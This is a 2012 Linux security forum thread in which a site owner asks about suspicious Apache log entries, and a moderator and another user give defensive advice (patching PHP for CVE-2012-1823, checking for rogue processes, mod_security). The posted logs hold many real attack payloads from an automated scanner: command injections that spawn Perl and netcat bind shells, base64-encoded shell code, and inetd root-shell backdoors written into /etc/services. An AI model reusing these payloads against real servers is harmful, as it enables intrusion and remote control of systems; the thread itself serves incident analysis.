LinuxQuestions.org
Support LQ: Use code LQ3 and save $3 on Domain Registration
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices



Reply
 
Search this Thread
Old 11-13-2012, 03:35 AM   #1
alxkls
LQ Newbie
 
Registered: Nov 2012
Posts: 3

Rep: Reputation: Disabled
Apache and PHP security issue


While looking at the apache logs this morning I noticed a few that concerned me. They were encoded and didn't look like any of the code I wrote so I checked them out and this is what I found:
Code:
/?-d allow_url_include=ON --define safe_mode=FAlSE -d suhosin.simulation=on --define disable_functions="" --define open_basedir=none --define auto_prepend_file=php://input -n  


 /?search[send][]=eval&search[send][]=Kernel.fork do`nc -lp 27796 -e /bin/sh`end
I'm not quite sure how this works but since i do realize what nc -lp would have been used for I'm not exactly glad to see all this. Which is what brings me here... suggestions what to do?
 
Old 11-13-2012, 10:50 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,826
Blog Entries: 54

Rep: Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992
Quote:
Originally Posted by alxkls View Post
Code:
/?-d allow_url_include=ON (..)
what to do?
That's CVE-2012-1823, see http://www.linuxquestions.org/questi...4/#post4692267. Reading the links in the linked documents show you what actions to perform, the first and most important of which is checking your PHP version and upgrading it if vulnerable.
 
Old 11-13-2012, 11:33 AM   #3
alxkls
LQ Newbie
 
Registered: Nov 2012
Posts: 3

Original Poster
Rep: Reputation: Disabled
Yes I did find a few topics on regarding similar issues. But according to the www that has been fixed as of php 5.3.0 and i am using 5.3.3 so technically this shouldn't be an issue. The one that worries me more is the second one. I couldn't find pretty much any useful information about it except that it is used in metasploit software. I tried performing the same actions myself in the same order as the one listed in the apache logs and by the looks of it they did not appear to do anything but I am not 100% sure about it-as i said-this isn't documented anywhere.
 
Old 11-13-2012, 12:06 PM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,826
Blog Entries: 54

Rep: Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992Reputation: 2992
Quote:
Originally Posted by alxkls View Post
i am using 5.3.3 so technically this shouldn't be an issue.
Should've said that in your OP.


Quote:
Originally Posted by alxkls View Post
by the looks of it they did not appear to do anything but I am not 100% sure
- If the return code shows nothing in your web stack is susceptible to that kind of attack,
- if there aren't any rogue processes (or web server DSO's!) on the server,
- if there aren't any foreign objects in any directory the web server can write to or read from,
- if there aren't stray error messages in the web servers access and error logs,
- if whatever you provide in your web stack doesn't run obsolete software / plugin version,
- if people aren't able to pull off .htaccess or php.ini tricks to disable or circumvent restrictions
then you've checked things and can be reasonably certain it's all good.
That doesn't mean you shouldn't invest in hardening and auditing though.
Any questions about the latter should be accompanied by a list of what you did already.
 
Old 11-13-2012, 02:39 PM   #5
alxkls
LQ Newbie
 
Registered: Nov 2012
Posts: 3

Original Poster
Rep: Reputation: Disabled
Well after finally getting the chance to sit on my computer at home and investigate(using my phone was a nightmare) I discovered the following:
Both commands did not do anything that concerns me in any way. They did nothing. No unfamiliar processes, no error messages, php.ini is fine and all is running well.

It turns out that this is not likely to be human after examining the access log:
Code:
**.***.**.*** - - [13/Nov/2012:07:53:24 +0300] "GET / HTTP/1.0" 200 5586
**.***.**.*** - - [13/Nov/2012:07:56:46 +0300] "GET /phptax/drawimage.php?pdf=make&pfilez=xxx%3b%20perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c17553%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27 HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:07:56:47 +0300] "POST /pp088/tools/upload_file.php HTTP/1.1" 404 302
**.***.**.*** - - [13/Nov/2012:07:56:48 +0300] "GET /pp088/tools//IETF//DTD HTML 2.0//EN\"> HTTP/1.1" 404 297
**.***.**.*** - - [13/Nov/2012:07:57:34 +0300] "POST /Auxiliumpetratepro/admin/sitebanners/upload_banners.php HTTP/1.1" 404 330
**.***.**.*** - - [13/Nov/2012:07:57:34 +0300] "GET /Auxiliumpetratepro/banners/SXIyw.php HTTP/1.1" 404 311
**.***.**.*** - - [13/Nov/2012:07:58:08 +0300] "POST /xoda/?upload HTTP/1.1" 404 280
**.***.**.*** - - [13/Nov/2012:07:58:28 +0300] "GET /cgi-bin/learn-msg.cgi?id=%7cperl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c15235%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3b HTTP/1.1" 404 296
**.***.**.*** - - [13/Nov/2012:07:58:46 +0300] "POST /testlink-1.9.3/firstLogin.php HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:07:59:08 +0300] "POST /WANem/result.php HTTP/1.1" 404 291
**.***.**.*** - - [13/Nov/2012:07:59:26 +0300] "GET /mobilecartly/includes/savepage.php?savepage=PyAyR.php&pagecontent=%3c%3fphp%20system%28base64%5fdecode%28%27cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw4NTE3LFJldXNlLDEsTGlzdGVuKS0%2bYWNjZXB0OyR%2bLT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTtzeXN0ZW0kXyB3aGlsZTw%2bJw%3d%3d%27%29%29%3bunlink%28%5f%5fFILE%5f%5f%29%3b%20%3f%3e HTTP/1.1" 404 309
**.***.**.*** - - [13/Nov/2012:07:59:27 +0300] "GET /mobilecartly/pages/PyAyR.php HTTP/1.1" 404 303
**.***.**.*** - - [13/Nov/2012:07:59:48 +0300] "POST /cuteflow_v.2.11.2/pages/restart_circulation_values_write.php HTTP/1.1" 404 335
**.***.**.*** - - [13/Nov/2012:07:59:48 +0300] "GET /cuteflow_v.2.11.2/upload/___1/MfY6uV.php HTTP/1.1" 404 315
**.***.**.*** - - [13/Nov/2012:08:00:09 +0300] "GET /spywall/pbcontrol.php?filename=oZbb%22%3bperl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c21824%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3b%22&stage=0 HTTP/1.1" 404 296
**.***.**.*** - - [13/Nov/2012:08:00:31 +0300] "POST /www/work/resultimage.php HTTP/1.1" 404 299
**.***.**.*** - - [13/Nov/2012:08:00:31 +0300] "GET /www/results/blah.php HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:00:50 +0300] "POST /sample/egallery/uploadify.php HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:01:06 +0300] "POST /sflog/admin/login.php HTTP/1.1" 404 296
**.***.**.*** - - [13/Nov/2012:08:01:21 +0300] "GET /tiki/tiki-rss_error.php HTTP/1.1" 404 298
**.***.**.*** - - [13/Nov/2012:08:02:01 +0300] "GET //basilic-1.5.14//Config/diff.php?file=%26perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c30526%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%20%23&new=1&old=2 HTTP/1.1" 404 306
**.***.**.*** - - [13/Nov/2012:08:02:58 +0300] "POST /wp-content/plugins/foxypress/uploadify/uploadify.php HTTP/1.1" 404 327
**.***.**.*** - - [13/Nov/2012:08:03:36 +0300] "GET /bf102/index.php HTTP/1.1" 404 290
**.***.**.*** - - [13/Nov/2012:08:06:26 +0300] "POST /spywall/ipchange.php HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:06:27 +0300] "POST /spywall/blocked_file.php HTTP/1.1" 404 299
**.***.**.*** - - [13/Nov/2012:08:06:29 +0300] "GET /spywall/login.php HTTP/1.1" 404 292
**.***.**.*** - - [13/Nov/2012:08:07:23 +0300] "POST /?-%64+allow_url_include%3dON+--define+safe_mode%3dFAlSE+-d+suhosin.simulation%3don+--define+disable_functions%3d%22%22+--define+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+-n++ HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:07:41 +0300] "POST /WebCalendar-1.2.4/install/index.php HTTP/1.1" 404 310
**.***.**.*** - - [13/Nov/2012:08:07:41 +0300] "GET /WebCalendar-1.2.4/includes/settings.php HTTP/1.1" 404 314
**.***.**.*** - - [13/Nov/2012:08:07:57 +0300] "GET /dolibarr/ HTTP/1.1" 404 284
**.***.**.*** - - [13/Nov/2012:08:08:30 +0300] "POST /horde/services/javascript.php HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:08:49 +0300] "POST /vb/vbseocp.php HTTP/1.1" 404 289
**.***.**.*** - - [13/Nov/2012:08:10:24 +0300] "POST /appRain-q-0.1.5/addons/uploadify/uploadify.php HTTP/1.1" 404 321
**.***.**.*** - - [13/Nov/2012:08:10:26 +0300] "GET /api/project/repo/log/graph/%60%6e%63%2520%2d%6c%70%2520%31%35%35%36%36%2520%2d%65%2520/%62%69%6e/%73%68%60 HTTP/1.1" 404 335
**.***.**.*** - - [13/Nov/2012:08:12:46 +0300] "POST /license.php HTTPS/1.1" 404 286
**.***.**.*** - - [13/Nov/2012:08:12:48 +0300] "POST /op5config/welcome HTTPS/1.1" 404 292
**.***.**.*** - - [13/Nov/2012:08:13:39 +0300] "POST /admincp/plugins.php?newhook HTTP/1.1" 404 294
**.***.**.*** - - [13/Nov/2012:08:13:40 +0300] "GET /index.php HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:14:19 +0300] "GET /fcms/dev/less.php?argv%5b1%5d=%7cecho%20JuvkyL%3bperl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c13951%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3becho%20DHihiTE%3b%23 HTTP/1.1" 404 292
**.***.**.*** - - [13/Nov/2012:08:14:37 +0300] "POST /vcms/includes/inline_image_upload.php HTTP/1.1" 404 312
**.***.**.*** - - [13/Nov/2012:08:14:38 +0300] "GET /vcms/temp/MmzFf.php HTTP/1.1" 404 294
**.***.**.*** - - [13/Nov/2012:08:15:31 +0300] "POST /pmwiki.php HTTP/1.1" 404 285
**.***.**.*** - - [13/Nov/2012:08:15:32 +0300] "POST /pmwiki.php HTTP/1.1" 404 285
**.***.**.*** - - [13/Nov/2012:08:15:51 +0300] "GET /phpldapadmin/htdocs/index.php HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:15:51 +0300] "POST /phpldapadmin/htdocs/cmd.php HTTP/1.1" 404 302
**.***.**.*** - - [13/Nov/2012:08:16:09 +0300] "GET /index.php HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:16:29 +0300] "GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60%6e%63%20%2d%6c%70%20%32%37%37%39%36%20%2d%65%20/%62%69%6e/%73%68%60end HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:16:53 +0300] "GET /snortreport-1.3.2/nmap.php?target=127.0.0.1%20%26%26%20echo%20XXXXX%20%26%26%20eval%20%24%28echo%20cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTM3OSxSZXVzZSwxLExpc3RlbiktPmFjY2VwdDskfi0%2bZmRvcGVuKCRjLHcpO1NURElOLT5mZG9wZW4oJGMscik7c3lzdGVtJF8gd2hpbGU8Pic%3d%20%7c%20base64%20-d%29%20%26%26%20echo%20ZZZZZ HTTP/1.1" 404 301
**.***.**.*** - - [13/Nov/2012:08:17:14 +0300] "GET /interface/interface.php?uniqueKey=8005115985971 HTTP/1.1" 404 298
**.***.**.*** - - [13/Nov/2012:08:17:27 +0300] "POST /WeBid/converter.php HTTP/1.1" 404 294
**.***.**.*** - - [13/Nov/2012:08:17:51 +0300] "GET /api/orders.json?search[instance_eval]=Kernel.fork%20do%60%6e%63%20%2d%6c%70%20%31%36%37%32%20%2d%65%20/%62%69%6e/%73%68%60end HTTP/1.1" 404 290
**.***.**.*** - - [13/Nov/2012:08:18:09 +0300] "POST /log1cms2.0/admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.1" 404 340
**.***.**.*** - - [13/Nov/2012:08:18:10 +0300] "GET /log1cms2.0/admin/libraries/ajaxfilemanager/inc/data.php HTTP/1.1" 404 330
**.***.**.*** - - [13/Nov/2012:08:18:28 +0300] "GET /lcms/ HTTP/1.1" 404 280
**.***.**.*** - - [13/Nov/2012:08:18:54 +0300] "\x16\x03" 200 5586
**.***.**.*** - - [13/Nov/2012:08:19:15 +0300] "GET /projects/1/repository/annotate?rev=`nc%20-lp%2023174%20-e%20/bin/sh` HTTP/1.1" 404 305
**.***.**.*** - - [13/Nov/2012:08:20:04 +0300] "POST / HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:20:05 +0300] "POST / HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:20:05 +0300] "GET / HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:20:57 +0300] "GET /AjaXplorer-2.5.5/plugins/access.ssh/checkInstall.php?destServer=%7c%7cperl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c9593%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27 HTTP/1.1" 404 327
**.***.**.*** - - [13/Nov/2012:08:21:44 +0300] "POST /catalog/admin/file_manager.php/login.php?action=save HTTP/1.1" 404 315
**.***.**.*** - - [13/Nov/2012:08:21:45 +0300] "GET /catalog/O1oU6.php HTTP/1.1" 404 292
**.***.**.*** - - [13/Nov/2012:08:22:01 +0300] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder= HTTP/1.1" 404 347
**.***.**.*** - - [13/Nov/2012:08:23:59 +0300] "POST /nagios3/cgi-bin/statuswml.cgi HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:24:14 +0300] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 303
**.***.**.*** - - [13/Nov/2012:08:24:33 +0300] "POST /dogfood/mail/spell.php HTTP/1.1" 404 297
**.***.**.*** - - [13/Nov/2012:08:24:47 +0300] "POST /cgi-bin/ck/mimencode?-u+-o+spamkeeper.dat HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:24:50 +0300] "GET /cgi-bin/ck/spamkeeper.dat HTTP/1.1" 404 300
**.***.**.*** - - [13/Nov/2012:08:25:05 +0300] "POST /phpscheduleit/reserve.php HTTP/1.1" 404 300
**.***.**.*** - - [13/Nov/2012:08:25:24 +0300] "GET /awstatstotals/awstatstotals.php?sort=\"].passthru('echo%20YYY;perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c31455%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27;echo%20YYY;').exit().%24a[\" HTTP/1.1" 404 306
**.***.**.*** - - [13/Nov/2012:08:26:05 +0300] "GET /base/base_qry_common.php?BASE_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%33%2e%31%39%38%3a%38%30%38%30%2f%50%34%38%6d%70%6a%54%6a%56%7a%37%3f HTTP/1.1" 404 299
**.***.**.*** - - [13/Nov/2012:08:26:07 +0300] "GET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%33%2e%31%39%38%3a%38%30%38%30%2f%6a%38%41%37%72%49%43%6e%39%6f%3f HTTP/1.1" 404 305
**.***.**.*** - - [13/Nov/2012:08:26:47 +0300] "POST /cpg1414/picEditor.php HTTP/1.1" 404 296
**.***.**.*** - - [13/Nov/2012:08:27:03 +0300] "GET /tikiwiki/tiki-graph_formula.php?w=63&h=863&s=356&min=228&max=238&f[]=x.sqrt.passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))&t=pdf&title= HTTP/1.1" 404 306
**.***.**.*** - - [13/Nov/2012:08:27:03 +0300] "GET /tikiwiki/tiki-graph_formula.php?w=900&h=878&s=137&min=61&max=123&f[]=x.ceil.eval(base64_decode(c3lzdGVtKGJhc2U2NF9kZWNvZGUoJ2NHVnliQ0F0VFVsUElDMW.chr(120).JQ2NrY0Q.chr(120).bWIzSnJLQ2s3WlhocGRDeHBaaVJ3T3lSalBXNW.chr(120).keUJKVHpvNlUyOWphMlYwT2pwSlRrVlVLRXh2WTJGc1VHOXlkQ3c0TkRNMU.chr(120).GSm.chr(120).kWE5sTERFc1RHbHpkR1Z1S1MwK1lXTmpaWEIwT3lSK0.chr(120).UNW1aRzl3Wlc0b0pHTXNkeWs3VTFSRVNVNHRQbVprYjNCbGJpZ2tZeXh5S1R0emVYTjBaVzBrWHlCM2FHbHNaVHcrSnc9PScpKTs))&t=pdf&title= HTTP/1.1" 404 306
**.***.**.*** - - [13/Nov/2012:08:28:05 +0300] "POST /tikiwiki//jhot.php HTTP/1.1" 404 293
**.***.**.*** - - [13/Nov/2012:08:28:06 +0300] "GET /tikiwiki//img/wiki/tiki-config.php HTTP/1.1" 404 309
**.***.**.*** - - [13/Nov/2012:08:28:06 +0300] "GET /tikiwiki//img/wiki/tiki-config.php HTTP/1.1" 404 309
**.***.**.*** - - [13/Nov/2012:08:28:24 +0300] "GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;cd%20/tmp%20%26%26perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c17743%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27;echo%20YYY;echo|awstats263220.demo.txt HTTP/1.1" 404 293
**.***.**.*** - - [13/Nov/2012:08:28:38 +0300] "POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1" 404 312
**.***.**.*** - - [13/Nov/2012:08:28:54 +0300] "GET /twiki/bin/view/Main/TWikiUsers?rev=20%20%60cp%20/etc/services%20/tmp/.HFJxMMQQkyszWjxPPvuOPrynVPCcIquW%3becho%20koiyoxpfy%2019275/tcp%3e%3e/etc/services%3becho%20koiyoxpfy%20stream%20tcp%20nowait%20root%20/bin/sh%20sh%3e/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%3binetd%20-s%20/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%20%7c%7c/usr/sbin/inetd%20-s%20/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%20%7c%7c/usr/etc/inetd%20-s%20/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%3bcp%20/tmp/.HFJxMMQQkyszWjxPPvuOPrynVPCcIquW%20/etc/services%3brm%20/tmp/.zBjhViiRYeEFtHMKabOfAZnZxTmcSkwY%20/tmp/.HFJxMMQQkyszWjxPPvuOPrynVPCcIquW%3b%60%23 HTTP/1.1" 404 305
**.***.**.*** - - [13/Nov/2012:08:29:14 +0300] "GET /cgi-bin/img.pl?f=../../../../../../../../bin/sh%20-c%20%22echo%20%27YYY%27%3b%20perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c31031%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3b%20echo%20%27YYY%27%22%7c HTTP/1.1" 404 289
**.***.**.*** - - [13/Nov/2012:08:30:41 +0300] "GET /OvCgi/connectedNodes.ovpl?node=%3b%20echo%20YYY%3b%20perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c11545%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27%3b%20echo%20YYY%7c%20tr%20%22\\n%22%20%22%a3%22 HTTP/1.1" 404 300
**.***.**.*** - - [13/Nov/2012:08:30:43 +0300] "GET /sphpblog/config/password.txt HTTP/1.1" 404 303
**.***.**.*** - - [13/Nov/2012:08:31:26 +0300] "GET / HTTP/1.0" 200 5586
**.***.**.*** - - [13/Nov/2012:08:31:41 +0300] "GET / HTTP/1.1" 200 5586
**.***.**.*** - - [13/Nov/2012:08:31:57 +0300] "POST /xmlrpc.php HTTP/1.1" 404 285
**.***.**.*** - - [13/Nov/2012:08:33:49 +0300] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;perl%20-MIO%20-e%20%27%24p%3dfork%28%29%3bexit%2cif%24p%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28LocalPort%2c29523%2cReuse%2c1%2cListen%29-%3eaccept%3b%24%7e-%3efdopen%28%24c%2cw%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3bsystem%24%5f%20while%3c%3e%27;echo%20YYY;echo| HTTP/1.1" 404 293
**.***.**.*** - - [13/Nov/2012:08:33:51 +0300] "GET /cacti/graph_view.php?action=list HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:35:03 +0300] "GET /twiki/bin/view/Main/WebSearch?search=0sVbp%27%3bcp%24%7bIFS%7d/etc/services%24%7bIFS%7d/tmp/.fykCMfvdCtDwFiDwkTKJlbAardgzUjzA%3becho%24%7bIFS%7dzzkyqkhvv%24%7bIFS%7d10005/tcp%3e%3e/etc/services%3becho%24%7bIFS%7dzzkyqkhvv%24%7bIFS%7dstream%24%7bIFS%7dtcp%24%7bIFS%7dnowait%24%7bIFS%7droot%24%7bIFS%7d/bin/sh%24%7bIFS%7dsh%3e/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%3binetd%24%7bIFS%7d-s%24%7bIFS%7d/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%24%7bIFS%7d%7c%7c/usr/sbin/inetd%24%7bIFS%7d-s%24%7bIFS%7d/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%24%7bIFS%7d%7c%7c/usr/etc/inetd%24%7bIFS%7d-s%24%7bIFS%7d/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%3bcp%24%7bIFS%7d/tmp/.fykCMfvdCtDwFiDwkTKJlbAardgzUjzA%24%7bIFS%7d/etc/services%3brm%24%7bIFS%7d/tmp/.pSyTyCLXGFmdhhuYbfEtDYsXtzmVRqJq%24%7bIFS%7d/tmp/.fykCMfvdCtDwFiDwkTKJlbAardgzUjzA%3b%3b%23%27 HTTP/1.1" 404 304
**.***.**.*** - - [13/Nov/2012:08:35:03 +0300] "GET /phpBB2/viewtopic.php?topic=18 HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:36:11 +0300] "POST /cgi-bin/guestbook.pl HTTP/1.1" 404 295
**.***.**.*** - - [13/Nov/2012:08:36:14 +0300] "GET /guestbook/guestbook.html HTTP/1.1" 404 299
**.***.**.*** - - [13/Nov/2012:08:36:47 +0300] "GET /cgi-bin/generic?cmd=nc%20-lp%2014211%20-e%20/bin/sh HTTP/1.1" 404 290
And none of those holds a potential harm to me so...

Anyways thanks unSpawn
 
Old 11-17-2012, 04:08 PM   #6
sneakyimp
Member
 
Registered: Dec 2004
Posts: 795

Rep: Reputation: 50
I believe mod_security can help protect against this kind of attack. I've had problems with it before -- a filter was interfering with normal website behavior -- but it looks to me like it filters a large number of attacks.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Apache and php issue wassimdarwich Fedora 1 11-25-2008 09:56 PM
apache mod_rewrite security issue fixed? mastrboy Debian 1 08-03-2006 04:27 PM
Apache security issue ivanatora Linux - General 4 04-18-2005 06:46 AM
apache/php security sopiaz57 Linux - Security 1 06-13-2004 04:52 AM


All times are GMT -5. The time now is 09:38 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration